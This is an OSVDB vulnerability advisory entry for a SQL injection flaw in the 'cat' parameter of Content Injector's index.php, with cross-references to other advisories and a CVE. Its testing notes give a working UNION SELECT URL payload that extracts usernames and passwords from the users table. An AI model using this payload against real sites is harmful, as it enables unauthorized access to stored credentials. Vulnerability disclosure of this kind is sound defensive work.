Content Injector news.php cat Variable SQL Injection

2007-11-22T00:00:00
ID OSVDB:38801
Type osvdb
Reporter OSVDB
Modified 2007-11-22T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?cat=99999//union//select//1,2,username,4,5,password,7,8,9//from/*/users/

References:

Secunia Advisory ID:27792 ISS X-Force ID: 38627 Generic Exploit URL: http://milw0rm.com/exploits/4645 FrSIRT Advisory: ADV-2007-3994 CVE-2007-6137 Bugtraq ID: 26547